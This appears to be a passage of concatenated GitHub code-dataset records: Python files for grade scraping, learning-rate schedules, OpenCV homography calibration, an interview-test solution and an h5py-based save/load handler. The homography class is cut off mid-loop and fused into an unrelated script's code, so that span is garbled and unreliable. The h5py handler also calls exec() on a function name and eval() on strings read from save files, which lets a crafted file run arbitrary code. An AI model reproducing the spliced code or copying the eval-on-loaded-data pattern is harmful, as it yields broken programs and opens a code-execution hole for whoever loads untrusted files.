get_grades_matrix(self):\n table = self.search_by_ID(GRADES_TABLE_ID)\n grade_rows = self.get_elements_inside_element_by_xpath(table,GRADE_ROWS_XPATH)\n if not 
grade_rows: raise Exception(\"No grades in this screen\")\n grades = []\n for row in grade_rows:\n cells = self.get_row_data_cells(row)\n if not cells: raise Exception(\"Row without cells\")\n grades.append([cells[1].text,self.get_grade_from_cell(cells[3]),self.get_hours_from_cell(cells[2])])\n return grades","repo_name":"mlvillarroya/saga_grades_extract","sub_path":"classes/web/pages/StudentGradesWeb.py","file_name":"StudentGradesWeb.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29314173347","text":"import sys\n\nimport torch\n\nimport numpy as np\n\n\ndef get_lr_policy(lr_schedule):\n \"\"\"Implement a new scheduler directly in this file. \n Args should contain a single choice for learning rate scheduler.\"\"\"\n\n d = {\n \"cosine\": cosine_schedule,\n \"step\": step_schedule,\n \"cubic\": cubic_schedule,\n }\n return d[lr_schedule]\n\n\ndef get_optimizer(model, args):\n if args.optimizer == \"sgd\":\n optim = torch.optim.SGD(\n model.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.wd,\n )\n elif args.optimizer == \"adam\":\n optim = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd,)\n elif args.optimizer == \"rmsprop\":\n optim = torch.optim.RMSprop(\n model.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.wd,\n )\n else:\n print(f\"{args.optimizer} is not supported.\")\n sys.exit(0)\n return optim\n\n\ndef new_lr(optimizer, lr):\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\ndef cubic_schedule(optimizer, args):\n def set_lr(step, step_per_epoch, lr=args.lr):\n warmup_step = args.warmup_epochs * step_per_epoch\n total_step = (args.epochs - args.warmup_epochs) * step_per_epoch\n if step < warmup_step:\n a = lr * step / warmup_step\n else:\n cos_step = step - warmup_step\n a = lr * (1 - cos_step / total_step) ** 3\n\n new_lr(optimizer, a)\n\n return set_lr\n\n\ndef cosine_schedule(optimizer, args):\n def set_lr(step, step_per_epoch, lr=args.lr):\n warmup_step = args.warmup_epochs * step_per_epoch\n total_cosine_step = (args.epochs - args.warmup_epochs) * step_per_epoch\n if step < warmup_step:\n a = lr * step / warmup_step\n else:\n cos_step = step - warmup_step\n a = lr * 0.5 * (1 + np.cos(cos_step / total_cosine_step * np.pi))\n\n new_lr(optimizer, a)\n\n return set_lr\n\n\ndef step_schedule(optimizer, args):\n def set_lr(step, step_per_epoch, lr=args.lr):\n warmup_step = args.warmup_epochs * step_per_epoch\n total_step = (args.epochs - args.warmup_epochs) * step_per_epoch\n\n if step < warmup_step:\n a = lr * step / warmup_step\n else:\n a = lr\n if step >= 0.5 * total_step:\n a *= 0.1\n if step >= 0.75 * total_step:\n a *= 0.01\n\n new_lr(optimizer, a)\n\n return set_lr\n","repo_name":"NormalUhr/hydra-structured","sub_path":"utils/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"11392199066","text":"import cv2\nimport time\nimport numpy as np\n\nclass CalibracionHomografia():\n def __init__(self, archivoProyector, imgCamera): \n self.imgProy = cv2.imread(archivoProyector)\n self.imgCamera = imgCamera.copy()\n self.heightProy, self.widthProy, _ = self.imgProy.shape\n self.areaProy = self.heightProy*self.widthProy\n self.pts = []\n self.ptos_proj =np.array([[0, 0],[0,self.heightProy],[self.widthProy,self.heightProy],[self.widthProy,0]])\n
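The cosine-with-warmup rule in the schedules record above is easy to sanity-check numerically. A hedged sketch (the step counts and base rate below are invented for illustration, not taken from the repo):

import numpy as np
lr, warmup_step, total_cosine_step = 0.1, 100, 900
for step in (50, 100, 550, 1000):
    if step < warmup_step:
        a = lr * step / warmup_step          # linear warmup
    else:
        cos_step = step - warmup_step        # cosine decay after warmup
        a = lr * 0.5 * (1 + np.cos(cos_step / total_cosine_step * np.pi))
    print(step, round(a, 4))
# 50 -> 0.05 (mid-warmup), 100 -> 0.1 (peak), 550 -> 0.05 (half decayed), 1000 -> 0.0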
def CrearMascara(self, l_h, l_s, l_v,u_h, u_s, u_v):\n hsv = cv2.cvtColor(self.imgCamera, cv2.COLOR_BGR2HSV)\n l_b = np.array([l_h, l_s, l_v])\n u_b = np.array([u_h, u_s, u_v])\n mask = cv2.inRange(hsv, l_b, u_b)\n # Remove noise\n kernel = np.ones((5,5))\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n return mask\n def DeteccionBordes(self, mask):\n imgCanny = cv2.Canny(mask, 0, 188)# Canny detector\n # Dilate to improve edge visibility\n #imgDilation = cv2.dilate(imgCanny, kernel, iterations=1)\n #cv2.imshow('dil', imgDilation)\n return imgCanny\n def ObtenerPuntosHomografia(self, bordes, perc, relArea):\n self.pts = []\n time.sleep(1)\n contornos, jerarquia = cv2.findContours(bordes, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n vacio=[0,0];top_left_point=vacio;bottom_left_point=vacio;bottom_right_point=vacio;top_right_point=vacio\n imgContornos=self.imgCamera.copy()\n for i in contornos:\n cv2.drawContours(imgContornos, i,-1,(0,255,0), 2)# -1 -> all contours are drawn\n epsilon = perc*cv2.arcLength(i,True)/100.0\n approx = cv2.approxPolyDP(i,epsilon,True) \n x,y,w,h = cv2.boundingRect(approx)\n area=w*h\n relacion=float(area)*100/self.areaProy\n if len(approx)==4 and relacion>relArea:\n print(approx)\n cent = np.mean(approx, axis=0)\n centx=cent[0][0];centy=cent[0][1]\n # Assign the rectangle corner positions\n for [point] in approx:\n if point[0]<centx and point[1]<centy:\n top_left_point=[point[0], point[1]]\n if point[0]<centx and point[1]>centy:\n bottom_left_point=[point[0], point[1]]\n if point[0]>centx and point[1]>centy:\n bottom_right_point=[point[0], point[1]]\n if point[0]>centx and point[1]<centy:\n top_right_point=[point[0], point[1]]\n\nif args.segment > 0:\n segment_file_names = []\n\n for otpl_file in config.input_files:\n segment_file_names.extend(segment_otpl_file(otpl_file, args.segment, config.encoding))\n\n config.input_files = segment_file_names\n\nsys.exit(otpl_to_text(config))\n","repo_name":"fnl/otplc","sub_path":"scripts/otpl-extractor.py","file_name":"otpl-extractor.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14566259276","text":"import time, re\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom typing import List, Tuple, Union, Optional\nfrom heapq import heappop, heappush, heapify, heappushpop, heapreplace\nfrom collections import defaultdict, deque, Counter, OrderedDict\nfrom itertools import accumulate, permutations, combinations, product, compress, zip_longest, pairwise, groupby\nfrom math import perm, comb, gcd, lcm, inf, ceil, floor, factorial, dist, sqrt\nfrom functools import cache, lru_cache, reduce\nfrom sortedcontainers import SortedList, SortedSet, SortedDict\nfrom bisect import bisect_left, bisect_right, insort, insort_left, insort_right\n\nfrom collections import Counter\n# def func():\n# n = int(input())\n# arr = list(map(lambda x: int(x, 16), input().split(\" \")))\n# bits = []\n# for num in arr:\n# for i in range(15, -1, -1):\n# if num & (1 << i):\n# bits.append(1)\n# else:\n# bits.append(0)\n# bits = bits[:n]\n# cnt = Counter(bits)\n# if cnt[1] == n or cnt[0] > cnt[1]:\n# print(0)\n# return\n#\n# nebits = list(map(lambda x: x ^ 1, bits))\n# lspan = 0\n# for span in range(1, n):\n# flag = True\n# for i, c in enumerate(bits):\n# if c == 1:\n# continue\n# else:\n# if i + span > n or bits[i + span] == 0:\n# flag = False\n# break\n# if flag:\n# lspan = span\n# break\n#\n# rspan = 0\n# for span in range(1, n):\n# flag = True\n# for i in range(len(bits) - 1, -1, -1):\n# if bits[i] == 1:\n# continue\n# else:\n# if i - span < 0 or bits[i - span] == 0:\n# flag 
= False\n# break\n# if flag:\n# rspan = span\n# break\n#\n# # arr = []\n# # i = 0\n# # while i < n:\n# # j = i + 1\n# # while j < n and bits[j] == bits[i]:\n# # j += 1\n# # arr.append((bits[i], j - i))\n# # i = j\n# # rightF = True\n# # rans = 0\n# # r = ''\n# # for i in range(len(arr)):\n# # if arr[i][0] == 0:\n# # if i > 0 and arr[i - 1][1] >= arr[i][1]:\n# # rans = max(rans, arr[i][1])\n# # else:\n# # rightF = False\n# # break\n# l, r = '', ''\n# if rspan != 0:\n# tr = nebits[rspan:] + [0] * rspan\n# r = \"\".join(map(str, tr))\n# # leftF = True\n# # lans = 0\n# # l = ''\n# # for i in range(len(arr) - 1, -1, -1):\n# # if arr[i][0] == 0:\n# # if i < len(arr) - 1 and arr[i + 1][1] >= arr[i][1]:\n# # lans = max(lans, arr[i][1])\n# # else:\n# # leftF = False\n# # break\n#\n# if lspan != 0:\n# lr = [0] * lspan + nebits[:len(nebits) - lspan]\n# l = \"\".join(map(str, lr))\n# if lspan != 0 and rspan != 0:\n# print(2)\n# print(f'+{rspan}')\n# print(r)\n# print(f'-{lspan}')\n# print(l)\n# elif lspan != 0:\n# print(1)\n# print(f'-{lspan}')\n# print(l)\n# elif rspan != 0:\n# print(1)\n# print(f'+{rspan}')\n# print(r)\n# else:\n# print(0)\n#\n\n#\n\ndef func():\n buc = {\n ('!', '!'): 0,\n ('@', '!'): 13,\n ('!', '@'): 13,\n ('!', '#'): 4,\n ('#', '!'): 4,\n ('@', '@'): 7,\n ('#', '@'): 20,\n ('@', '#'): 20,\n ('#', '#'): 5\n }\n chars = '#@!'\n n = int(input().strip())\n s = input().strip()\n l, r = s.split(\"+\")\n if '.' not in l:\n l += '.0'\n if '.' not in r:\n r += '.0'\n al, ar = l.split('.')\n bl, br = r.split('.')\n def fn(s1, s2, carry):\n la, lb = len(s1), len(s2)\n size = max(la, lb)\n arr1, arr2 = ['0'] * size, ['0'] * size\n for i, c in enumerate(s1):\n arr1[i] = c\n for i, c in enumerate(s2):\n arr2[i] = c\n ans = ['0'] * size\n for i in range(size - 1, -1, -1):\n if arr1[i] in chars:\n tmp = buc[(arr1[i], arr2[i])]\n mod = (tmp + carry) % 10\n carry = (tmp + carry) // 10\n else:\n a, b = int(arr1[i]), int(arr2[i])\n mod = (a + b + carry) % 10\n carry = (a + b + carry) // 10\n ans[i] = str(mod)\n return ''.join(ans), carry\n\n rs, rc = fn(ar, br, 0)\n ls, lc = fn(al, bl, rc)\n ans = (str(lc) if lc else '') + ls + '.' + rs\n ans = float(ans)\n if int(ans) == ans:\n print(int(ans))\n else:\n print(ans)\n\n\nif __name__ == '__main__':\n func()\n\n # a = '0xE77F'\n # print(bin(int('14', 16)))\n # print(float('0250'))\n # print(int('0250'))\n","repo_name":"ccctw-ma/leetcode","sub_path":"src/InterviewTest/23.5.6huawei.py","file_name":"23.5.6huawei.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18493201809","text":"# All functions and classes that involve file interactions.\n# Oursourced from nnlib.nnlib with mo_05 to make the files smaller.\n__version__ = 'do_01'\n\nimport h5py\nimport numpy as np\nfrom pathlib import Path\nfrom collections.abc import Iterable\nfrom six import string_types\n\nfrom . 
import _interactive\nfrom .support_lib import MOD_SETTINGS, string_alts, NNLibUsageError\nfrom .abstract_containers import AbstractContainer, AbstractContainerGroup\nfrom .abstract_containers import is_cont_obj\n\n\n_func_containers = {}\n\n\ndef register_container(cont):\n _func_containers[cont.__name__] = cont\n\n\ndef instantiate_container(cont):\n \"\"\"Accepts either the name of a container in string form or a\n container object and builds an empty version of the container.\"\"\"\n if isinstance(cont, string_types):\n cont_name = cont\n elif is_cont_obj(cont) and cont.__name__ in _func_containers:\n cont_name = cont.__name__\n else:\n raise NNLibUsageError(\"Can only instantiate based on another \"\n \"object or string.\")\n try:\n return _func_containers[cont_name]()\n except KeyError:\n raise NNLibUsageError(\"Unknown container type: %s\", cont_name)\n\n\n# New in nnlib_v13: Unified design for all copy, save and load\n# operations that have been introduced up until now, handled by the\n# Copier class.\n\nclass Copier:\n \"\"\"Copiers can be instantiated directly or used by the functions\n implementing copy, load and save operations throughout the module.\n This is meant to streamline the process and make it easily\n expandable and flexible.\n \"\"\"\n\n def __init__(self, source=None, dest=None, deduplicator=None):\n \"\"\"Copier supports reading from and writing to\n AbstractContainer objects (source/dest need to be references to\n the requested objects). Note that this includes\n SerializedObjectHandler instances which provide the interface\n to data saved on disk.\n \"\"\"\n # A little sanity check (that can be overridden by setting the\n # DEBUG flag): If source and dest are able to tell their type\n # and they are equal, we should be safe to continue.\n # (Reminder: Them being equal does not necessarily mean they\n # are of the same type, but they contain the same kind of data.\n # This distinction is especially pertinent looking at\n # SerializedObjectHandler instances.) Otherwise we fail (or\n # warn).\n if source is None and dest is None:\n raise NNLibUsageError(\"Need to attach to at least one object.\")\n container_error = False\n if source is None:\n if is_cont_obj(dest):\n print(\"No source. Only 'set' operation is supported.\")\n else:\n container_error = True\n elif dest is None:\n if is_cont_obj(source):\n print(\"No destination. Only 'get' operation is supported.\")\n else:\n container_error = True\n else:\n if is_cont_obj(source) and is_cont_obj(dest):\n if not source.pull('type') == dest.pull('type'):\n if MOD_SETTINGS['DEBUG']:\n print(\"The types do not seem to match. Continue \"\n \"at your own risk.\")\n else:\n raise TypeError(\"The types do not match.\")\n else:\n container_error = True\n if deduplicator is not None:\n deduplicator.register(source, dest)\n if container_error:\n if MOD_SETTINGS['DEBUG']:\n print(\"The copier can only function on Container class \"\n \"instances, but at least one of source and dest \"\n \"does not look like one. Continue at your own \"\n \"risk.\")\n else:\n raise TypeError(\"The copier will only work on Container \"\n \"class instances.\")\n self.source = source\n self.dest = dest\n self.deduplicator = deduplicator\n\n def copy(self, target, dpcopy=None):\n \"\"\"Copys whatever is specified by 'target' (see the source's\n 'loadstore_keys' dict for valid keys) from source to\n destination. 
Note: For simplicity and security reasons, each\n Copier object can only work in one direction.\n Arguments\n target: Specifies what should be transferred from source to\n dest. Valid 'target' keys are either (iterables of)\n strings defined in the source's 'loadstore_instr' dict or\n 'all'. 'all' will transfer all targets that are currently\n enabled, i.e. contained in the source's loadstore_keys\n list.\n CHANGED in do_01: Target can now be an iterable, so more\n refined copy instructions are possible without rewriting\n 'loadstore_keys' of 'source'.\n dpcopy: Passing True forces the source to create carbon copys\n of the fields to be copied. False makes it only pass back\n references where applicable. When choosing None (default),\n the best guess (encoded in the source's 'loadstore_instr'\n dict) for each target key will be used.\n \"\"\"\n def _do_copy(key):\n \"\"\"Actually does the copying and the querying of the\n deduplicator.\n \"\"\"\n data = self.source.pull(key, dpcopy)\n if self.deduplicator:\n self.deduplicator.check(data)\n self.dest.push(key, data)\n # --Main function block--\n # Check if copying is available at all.\n if self.source is None or self.dest is None:\n raise NNLibUsageError(\"Copying is not supported in this context.\")\n # Choose applicable mode of operation.\n if target in string_alts['all']:\n # Shorthand notation for when everything is to be copied.\n for key in self.source.loadstore_instr.keys():\n _do_copy(key)\n elif (not isinstance(target, string_types)\n and isinstance(target, Iterable)):\n for key in target:\n _do_copy(key)\n else:\n _do_copy(target)\n\n def get(self, target, dpcopy=None):\n \"\"\"Gets whatever is specified by 'target' (see the source's\n loadstore_keys dict for valid keys) from source and returns it.\n Arguments\n target: Specifies what should be passed back. Valid 'target'\n keys are strings defined in the source's 'loadstore_instr'\n dict.\n dpcopy: Passing True forces the source to create carbon copys\n of the fields to be copied. False makes it only pass back\n references where applicable. When choosing the default\n None, the best guess (encoded in the source's\n 'loadstore_instr' dict) for each target key will be used.\n \"\"\"\n if self.source is None:\n raise NNLibUsageError(\"Getting is not supported in this context.\")\n return self.source.pull(target, dpcopy)\n\n def set(self, target, data):\n \"\"\"Sets the fields specified by 'target' (see the target's\n loadstore_keys dict for valid keys) in the destination to the\n list of data.\n \"\"\"\n if self.dest is None:\n raise NNLibUsageError(\"Setting is not supported in this context.\")\n self.dest.push(target, data)\n\n\nclass H5PyHandler(AbstractContainerGroup):\n \"\"\"This class contains everything necessary to interact with a .h5\n file that is used for loading and saving data to disk.\n \"\"\"\n\n def __init__(self, path, read_only=False):\n \"\"\"Accepts the path to a .h5 file. If read_only is True, the\n file must exist. Also, no operations that include a write\n operation will work. This is to guarantee that an existing\n save file cannot be changed accidentally. 
If read_only is\n False and the specified file does not exist, it will be\n created.\n \"\"\"\n self.read_only = read_only\n # H5PyHandler tracks the objects it already rebuilt.\n # This way, we avoid recreating multiple copies of the same\n # object.\n self.autobuilt_objs = {}\n self.tracked_objs = []\n # Make sure path is a pathlib path.\n path = Path(path)\n # Check the given path for plausible name extensions; add one\n # if none or a non-fitting one is present.\n if path.suffix not in {'.h5', '.hdf5'}:\n path = path.with_suffix('.h5')\n if path.exists() and not read_only:\n if _interactive:\n # In an interactive environment, have the user confirm\n # the overwrite.\n print(\"The given path already exists.\")\n resp = input(\"Overwrite completely? (If not, entries will \"\n \"only be selectively replaced) [yes/NO] > \")\n if not _interactive or resp in string_alts['yes']:\n try:\n path.unlink()\n except PermissionError:\n raise PermissionError(\"There was a problem overwriting \"\n \"the existing file. A likely cause \"\n \"is that it was not properly \"\n \"closed by another instance. \"\n \"(Path: %s)\" % str(path))\n # Open the file. These will throw errors if problems of any\n # sort are encountered. They are not caught as it makes the\n # most sense to fail and present them to the user.\n if read_only:\n self.file = h5py.File(str(path), mode='r')\n else:\n self.file = h5py.File(str(path), mode='a')\n\n def __del__(self):\n \"\"\"It is critical to properly close the hdf5 file once the\n Copier using the instance has expired, so we do just that when\n the current object gets garbage collected.\n \"\"\"\n self.file.close()\n del self.file\n\n def _write_dispatch(self, supergroup, name, data):\n \"\"\"There are several data structures that are not natively\n supported in a standard hdf5 file, so this function provides\n the necessary switching functionality to deal with all of them.\n As a general rule, all data is stored in attributes of the\n current group and that is also what is scanned when loading a\n file. If, however, there is anything more complex to be\n stored, the data will not be assigned directly; instead, a flag\n in the form of a string lead by two '@' symbols is assigned.\n Depending on the specific data type, either a dataset or a\n subgroup of the same name gets written into the file structure\n that then contains the data itself.\n \"\"\"\n # Check for Python strings.\n if isinstance(data, string_types):\n # These must be encoded into byte arrays before saving.\n supergroup.attrs[name] = data.encode('utf-8')\n # Check for Nonetypes.\n elif data is None:\n supergroup.attrs[name] = '@@None'\n # Check for numpy arrays.\n elif isinstance(data, np.ndarray):\n try:\n # Find arrays with multiple named fields by getting an\n # iterator over them. 
This will provoke an error if\n # there is only one field, serving as an implicit case\n # switch for simple datasets.\n names = iter(data.dtype.names)\n supergroup.attrs[name] = '@@multifieldds'\n subgroup = supergroup.create_group(name)\n self._write_dispatch(subgroup,\n '@shape',\n data.shape)\n for counter, fieldname in enumerate(names):\n self._write_dispatch(subgroup,\n str(counter).zfill(2) + fieldname,\n data[fieldname])\n except TypeError:\n # If no iterator could be obtained, we have a simple\n # dataset.\n supergroup.attrs[name] = '@@ds'\n self._write_dataset(supergroup, name, data)\n # Check for dictionaries.\n elif isinstance(data, dict):\n supergroup.attrs[name] = '@@dict'\n subgroup = supergroup.create_group(name)\n # CHANGED in nnlib_multiobject_v04: Not every immutable\n # data type can be used as a key in hdf5 files. To ensure\n # the fail-safeness and compatibility of the saving\n # process, the keys and values are now indexed (the\n # ordering doesn't matter) and both are saved individually.\n index = 0\n for key, value in data.items():\n # Call this function recursively for every key and\n # value in the dictionary.\n self._write_dispatch(subgroup, 'key_' + str(index), key)\n self._write_dispatch(subgroup, 'value_' + str(index), value)\n index += 1\n # Check for lists and tuples.\n elif isinstance(data, list) or isinstance(data, tuple):\n # Both can be dealt with in the same way as no functions in\n # this module care about the differences between them in\n # their inputs.\n supergroup.attrs[name] = '@@list'\n subgroup = supergroup.create_group(name)\n for i, d in enumerate(data):\n # Call this function recursively for every entry in the\n # list or tuple. Note that the attributes will be\n # numbered in ascending order to save the exact\n # sequence.\n self._write_dispatch(subgroup, str(i), d)\n # Check for sets.\n elif isinstance(data, set):\n # These are basically handled the same way as lists and\n # tuples. However, they are unordered and not interoperable\n # with lists and tuples in every context (e.g. they support\n # set operations like union), so we deal with them\n # separately.\n supergroup.attrs[name] = '@@set'\n subgroup = supergroup.create_group(name)\n for i, d in enumerate(data):\n # Call this function recursively for every entry in the\n # set. Note that sets are not ordered, but the items do\n # nevertheless receive a number (i) to simplify loading.\n self._write_dispatch(subgroup, str(i), d)\n # Check for frozen sets.\n elif isinstance(data, frozenset):\n # Frozen sets are mostly the same as sets, but they are\n # immutable which is important in certain contexts. (For\n # example, frozen sets can be used as dictionary keys.)\n # This is why they get special treatment.\n supergroup.attrs[name] = '@@frozenset'\n subgroup = supergroup.create_group(name)\n for i, d in enumerate(data):\n # Call this function recursively for every entry in the\n # set. 
Note that sets are not ordered, but the items do\n # nevertheless receive a number (i) to simplify loading.\n self._write_dispatch(subgroup, str(i), d)\n # Check if the data is an AbstractContainer instance (or looks\n # reasonably similar to one).\n elif is_cont_obj(data):\n # First, pull the identifying info from the container.\n cont_type = data.pull('type')\n cont_id = data.pull('id')\n # Create the magic key that will trigger instantiation of a\n # container object when the data is loaded and save\n # corresponding meta information.\n supergroup.attrs[name] = '@@contobject'\n subgroup = supergroup.create_group(name)\n subgroup.attrs['type'] = cont_type\n subgroup.attrs['id'] = cont_id\n # Test if the object was registered as having been saved\n # before. In that case, we do not want to overwrite.\n if not (cont_type,cont_id) in self.tracked_objs:\n # If it was not saved by this handler instance before,\n # we trigger an autosave.\n # Note that, during the copying process, the data will\n # be registered as a tracked object. This means that\n # a handler will not do implicit saving twice using the\n # same deduplication mechanism.\n subobj_handler = self.provide_access(cont_type, cont_id)\n subobj_copier = Copier(data, subobj_handler, self)\n subobj_copier.copy('all', dpcopy=False)\n # Check for function handles.\n elif callable(data):\n try:\n # Try out whether or not the function is accessible\n # from the base level of the nnlib module. If it is\n # not, a NameError will be thrown and caught below and\n # the function will be marked as having failed to be\n # saved. This is to make the saving and loading\n # process more reliable.\n exec(data.__name__)\n supergroup.attrs[name] = '@@func'\n except NameError:\n print(\"Function handles whose targets do not live in the \"\n \"namespace of the NNLib module cannot be recovered \"\n \"correctly as of version \" + __version__ + \". The \"\n \"function \" + data.__name__ + \" will therefore be \"\n \"skipped.\")\n supergroup.attrs[name] = '@@failed_func'\n supergroup[name] = data.__name__\n else:\n # The standard case for primitive data types: Save the data\n # as-is.\n supergroup.attrs[name] = data\n # Note that all errors raised here mean we have an\n # unhandled case, so there is no further catching\n # because the user should see the error.\n\n def _write_dataset(self, group, name, data):\n \"\"\"Takes care of writing datasets. Since H5Py does not like\n Unicode, this function will try to convert the data to fixed\n length binary strings if the assignment fails at first.\n \"\"\"\n try:\n group.create_dataset(name, data=data, compression='gzip')\n except TypeError:\n group.create_dataset(name, data=data.astype('a12'),\n compression='gzip')\n\n def _read_dispatch(self, supergroup, name):\n \"\"\"The sister function to _write_dispatch, designed to restore\n data that was saved using that. Returns the data in the\n original form to the caller.\n \"\"\"\n try:\n # Fetch the data from the file.\n data_in = supergroup.attrs[name]\n except KeyError:\n print(\"The key '\" + name + \"' is not present in the file. The \"\n \"reason may be that this file was saved with a previous \"\n \"version of the program.\")\n if _interactive:\n resp = input(\"Continue and replace with None? [yes/NO] > \")\n if resp in string_alts['yes']:\n return None\n else:\n raise\n else:\n raise\n # For compatibility and stability reasons, it is better to turn\n # the read data back into basic python types if they are numpy\n # ones. 
Note that this will not convert datasets because they\n # are handled separately, but only basic data types that get\n # stored directly as attributes in the file.\n if hasattr(data_in, 'dtype'):\n data_in = data_in.item()\n # The following are all the necessary switch cases to support\n # more complex data structures that h5py does not support\n # natively.\n if isinstance(data_in, bytes):\n data_out = data_in.decode('utf-8')\n elif data_in == '@@multifieldds':\n data_out = self._read_multifieldds(supergroup[name])\n elif data_in == '@@ds':\n data_out = self._read_dataset(supergroup[name])\n elif data_in == '@@dict':\n data_out = {}\n subgroup = supergroup[name]\n index = 0\n while ('key_' + str(index)) in subgroup.attrs.keys():\n key = self._read_dispatch(subgroup, 'key_' + str(index))\n value = self._read_dispatch(subgroup, 'value_' + str(index))\n data_out[key] = value\n index += 1\n elif data_in == '@@list':\n data_out = []\n subgroup = supergroup[name]\n for key in range(len(subgroup.attrs)):\n data_out.append(self._read_dispatch(subgroup, str(key)))\n elif data_in in ('@@set','@@frozenset'):\n data_out = set()\n subgroup = supergroup[name]\n for key in range(len(subgroup.attrs)):\n data_out.add(self._read_dispatch(subgroup, str(key)))\n if data_in == '@@frozenset':\n data_out = frozenset(data_out)\n elif data_in == '@@contobject':\n # Container objects are to be understood as internal links\n # within the save file. They reference another base item\n # in the same file and are identified via a unique ID. It\n # is common to see multiple objects referencing the same\n # subobjects. These cross connections are all saved and\n # restored as well, in the sense that no automatically\n # built subobject is reconstructed twice, basically\n # creating multiple copys, but instead providing references\n # when the subobject comes up again.\n cont_type = supergroup[name].attrs['type']\n cont_id = supergroup[name].attrs['id']\n if (type,id) in self.autobuilt_objs:\n # If the type and ID are in autobuilt_subobjs, simply\n # pull the reference and return that.\n data_out = self.autobuilt_objs[(cont_type,cont_id)]\n else:\n # If we land here, the object needs to be built.\n # Instantiate the object...\n data_out = instantiate_container(cont_type)\n # ...and fill it with the saved data by creating a new\n # copier and have it copy everything it finds.\n subobj_handler = self.provide_access(cont_type, cont_id)\n subobj_copier = Copier(subobj_handler, data_out)\n subobj_copier.copy('all')\n self.autobuilt_objs[(cont_type,cont_id)] = data_out\n elif data_in == '@@func':\n # Currently untested and likely broken. TODO: Test and fix!\n data_out = eval(supergroup[name][()])\n elif data_in == '@@failed_func':\n print(\"A function handle that could not be recovered was found: \"\n + supergroup[name][()])\n print(\"It will be substituted with a NoneType and we will try to \"\n \"run anyway. 
Expect errors!\")\n data_out = None\n elif data_in == '@@None':\n data_out = None\n else:\n data_out = data_in\n return data_out\n\n def _read_multifieldds(self, group):\n \"\"\"Reconstructs multi-field datasets like the ones FieldCreator\n objects create for base_data.\n \"\"\"\n shape = self._read_dispatch(group, '@shape')\n base_ndim = len(shape)\n daughter_ds = []\n daughter_dtypes = []\n for key in group.attrs.keys():\n if group.attrs[key] == '@@ds':\n daughter_ds.append(self._read_dataset(group[key]))\n elif group.attrs[key] == '@@multifieldds':\n daughter_ds.append(self._read_multifieldds(group[key]))\n elif key == '@shape':\n continue\n else:\n raise ValueError(\"Multifield datasets can only contain \"\n \"elementary datasets or other multifield \"\n \"datasets. The key '\" + key + \"' that was \"\n \"found points to neither of them.\")\n # It turns out that with multi-field datasets, it is\n # helpful to save the order of the internal fields as they\n # are indeed stored as a list internally. While this is\n # not noticeable in most situations, it does cause errors\n # when concatenating datasets of the same shape, but a\n # different internal ordering. We conserve the order by\n # putting a number in front of the field name at save time.\n # The ordering imposed this way is automatically followed\n # by the 'for' loop, so here we just have to eliminate the\n # numbers again.\n # The case switch should make sure that we can at least\n # adequately load the old saved data even though the\n # original order is lost.\n daughter_dtypes.append((key[2:],\n daughter_ds[-1].dtype,\n daughter_ds[-1].shape[base_ndim:]))\n data = np.empty(shape, dtype=daughter_dtypes)\n for field, name in zip(daughter_ds, daughter_dtypes):\n data[name[0]] = field\n return data\n\n def _read_dataset(self, dataset):\n \"\"\"Reads datasets. This is the inverse function of\n _write_dataset.\n \"\"\"\n data = np.empty(dataset.shape, dtype=dataset.dtype)\n # UPDATE: This read_direct instruction will fail rather\n # ungracefully if the dataset is of size zero, meaning there\n # is a zero dimension. By far the easiest solution in this\n # case is to simply not try to read anything. Since the\n # array created above cannot contain data anyway, there is\n # nothing further to consider.\n if min(dataset.shape) > 0:\n dataset.read_direct(data)\n # FIX: Data type checking for byte type must be done even if\n # the dataset is empty to avoid errors.\n if np.issubdtype(data.dtype, np.bytes_):\n data = data.astype('U12')\n return data\n\n # --Public functions--\n\n def register(self, source, dest):\n if dest.outer is not self:\n raise TypeError(\"Error using the deduplication engine: \"\n \"H5PyHandler instances can only track their own \"\n \"contents.\")\n self.tracked_objs.append((source.pull('type'),source.pull('id')))\n\n def check(self, data):\n \"\"\"Checking for duplications is redundant for H5PyHandler as\n the data dict is traversed when saving, anyway, so it is\n enough to deduplicate then.\"\"\"\n return data\n\n def create_instance(self, obj):\n obj_type = obj.pull('type')\n obj_id = obj.pull('id')\n return self.provide_access(obj_type, obj_id)\n\n def compile_entries_list(self):\n \"\"\"This method provides a nested dict with informations on the\n h5 file's contents. 
It is designed to enable a (user-driven or\n automated) selection of datasets to access.\n \"\"\"\n type_dict = {}\n for group_name in self.file.keys():\n base_name, base_id = group_name.split('_')\n if base_name not in type_dict.keys():\n type_dict[base_name] = {}\n contained_data = list(self.file[group_name].keys())\n type_dict[base_name][base_id] = contained_data\n return type_dict\n\n def interactive_provide_access(self, obj_type):\n \"\"\"A more user friendly variant of 'provide_access', this\n function takes a type and simplifies dealing with the internal\n IDs. If there is only one object fitting 'type' in the file,\n its ID is completely shadowed. If there is more than one and\n we are running interactively, a selection is presented to the\n user. In the same case but not running interactively, the\n first instance on the list is selected. If there is no fitting\n entry, an error is raised.\n \"\"\"\n type_dict = self.compile_entries_list()\n if obj_type in type_dict:\n mhandler_dict = type_dict[obj_type]\n if _interactive and len(mhandler_dict) > 1:\n print(\"Multiple \" + obj_type + \" instances found.\")\n selection = []\n for counter, variant in enumerate(mhandler_dict):\n selection.append(variant)\n print(\" \" + str(counter) + \": ID \" + str(variant)\n + \" containing \" + str(mhandler_dict[variant]))\n resp = input(\"Please select [/ABORT] > \")\n try:\n obj_id = selection[int(resp)]\n except (KeyError,ValueError):\n print(\"Aborted.\")\n return\n else:\n obj_id = list(mhandler_dict.keys())[0]\n else:\n raise NNLibUsageError(\"No \" + obj_type + \" instance found.\")\n return self.provide_access(obj_type, obj_id)\n\n def provide_access(self, 